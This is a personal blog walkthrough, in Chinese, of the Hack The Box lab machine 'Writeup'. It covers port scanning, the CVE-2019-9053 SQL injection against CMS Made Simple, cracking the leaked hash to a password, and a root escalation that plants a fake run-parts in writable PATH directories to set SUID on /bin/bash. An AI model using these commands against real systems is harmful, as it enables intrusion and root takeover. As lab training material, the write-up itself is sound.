HTB-Writeup

metafa1ica
  2025-08-02 17:24:39 2025-08-02 17:24:39 创建   2025-08-17 13:29:28 2025-08-17 13:29:28 更新    
1
2
3
ip='10.129.253.209'
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep ^[0-9] | cut -d '/' -f 1| tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip

开了22和80

image

页面提示防DOS,随便几个请求就封了一会IP,显然不让爆破

提示vim,所以应该有vim的备份文件

Page is hand-crafted with vi.

试了.index.html. swp.index.html.swo.index.html.swn都不行

robots.txt有文件

image

image

CMS Made Simple

网站为CMS Made Simple

image

有后台登录口

1
http://10.129.253.209/writeup/admin/login.php

2019年有个sql注入,CVE-2019-9053

跑了下结果为

1
2
3
4
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

还得爆破一下

1
2
echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash
hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt

密码为raykayjay9

逆天,后台怎么都登不上,结果是ssh连,有病吧

image

提权

1
2
jkr@writeup:/tmp$ pkexec --version
pkexec version 0.105

一键提权失败

image

staff组

1
2
jkr@writeup:/tmp$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

这里的staff不是debian标准group

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# 看看系统里哪些文件属于 staff
jkr@writeup:/tmp$ find / -group staff -type f 2>/dev/null
# 列出写目录
jkr@writeup:/tmp$ find / -group staff -type d -perm -g+w 2>/dev/null
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/ca-certificates
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin

重点关注这两个目录,都是可写的

1
2
3
jkr@writeup:/tmp$ ls -ld /usr/local/bin/ /usr/local/sbin/
drwx-wsr-x 2 root staff 20480 Apr 19  2019 /usr/local/bin/
drwx-wsr-x 2 root staff 12288 Apr 19  2019 /usr/local/sbin/

接下来就是要找到在某个条件下会触发且带root权限以及和上述目录有关的程序

1
https://github.com/DominicBreuker/pspy

目前唯一能和系统交互的就只有ssh登录,所以在一个窗口启动pspy32,另起一个登录

这样就抓到了ssh具体登录过程所触发的命令

image

劫持

首先观察到,有权限的两个路径/usr/local/bin//usr/local/sbin/写入环境变量后,就执行了run-parts,且为root权限

1
2
CMD: UID=0    PID=2576   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new          
CMD: UID=0    PID=2577   | run-parts --lsbsysinit /etc/update-motd.d

而搜索run-parts会发现默认路径在/bin/run-parts

1
2
jkr@writeup:~$ which run-parts
/bin/run-parts

显然,只需要在/usr/local/bin//usr/local/sbin/这两个路径创建个run-parts,就可以让系统优先执行恶意命令形成劫持

放/usr/local/bin ssh看起来和平时差不多

1
2
echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/sbin/run-parts; chmod +x /usr/local/sbin/run-parts
echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/bin/run-parts; chmod +x /usr/local/bin/run-parts

重新登录ssh

image

image

d4fff36a1a25b65512c9d645dd3db25b

  • 标题: HTB-Writeup
  • 作者: metafa1ica
  • 创建于 : 2025-08-02 17:24:39
  • 更新于 : 2025-08-17 13:29:28
  • 链接: https://metafa1ica.github.io/post/d9ab780b6d17/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
HTB-Writeup
  1. CMS Made Simple
  2. 提权
    1. staff组
    2. 劫持